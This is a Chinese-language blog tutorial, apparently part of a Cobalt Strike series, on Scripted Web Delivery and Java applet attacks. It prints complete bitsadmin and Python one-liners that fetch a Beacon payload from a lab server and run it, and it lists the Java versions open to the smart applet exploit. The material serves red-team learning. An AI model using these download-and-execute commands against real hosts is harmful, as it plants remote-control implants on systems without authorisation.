6. Cobalt Strike之Scripted Web Delivery (S)
CobaltStrike’s Scripted Web Delivery
Scripted Web Delivery (S)介绍实战
该能供可以生成一个无阶段的Beacon,也就是不需要stager的payload。同样需要CS创建一个web服务器来托管这个文件,并需要为目标主机提供一个方法来下载和运行此Beacon,包括bitsadmin,powershell 和 python。
- bitsadmin.exe:如果你的目标系统是Windows 7及以上操作系统,你可以使用bitsadmin命令,一个命令行工具,可用于创建下载上传进程。bitsadmin 方法通过 cmd.exe 来运行此可执行文件。
cmd.exe /c bitsadmin /transfer 3fbc http://192.168.222.134:80/attack %APPDATA%\3fbc.exe&%APPDATA%\3fbc.exe&del %APPDATA%\3fbc.exe
#在目标主机上打开”运行”执行代码,便会从CS web服务器上下载payload并运行。
Powershell:这玩意就不多说了,改日做个Powershell的章节
Python:使用exec命令执行储存在字符串或文件中的Python语句。Urllib2则是python2.7自带的库,常用于爬虫。
python -c “import urllib2; exec urllib2.urlopen(‘http://192.168.222.134:80/a').read();"
钓鱼攻击模块收尾
Java Signed Applet Attack和Java Smart Applet Attack
- Java Signed Applet Attack:签名Applet攻击,这个攻击会启动一个 web 服务器来托管一个自签名的 Java applet。访客被要求给这个 applet 权限来运行。当一个访客准许了这个权限,你就获取了到他们系统的权限。
- Java applet:用Java语言编写的小应用程序,可以直接嵌入到网页中,并能够产生特殊的效果。
- Java Smart Applet Attack:智能Applet攻击,这个applet分析它的环境并决定使用哪个Java漏洞利用。如果Java版本是有漏洞的,此applet会禁用安全沙箱,并使用Cobalt Strike的Java注入器执行payload。
The Smart Applet detects the Java version and uses an embedded exploit to disable the Java security sandbox. This attack is cross-platform and cross-browser.
Vulnerable Java Versions
Java 1.6.0_45 and below
Java 1.7.0_21 and below
- 这两攻击就不太想尝试了,因为很少很少有主机会存在applet的运行环境。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 DeepMountains!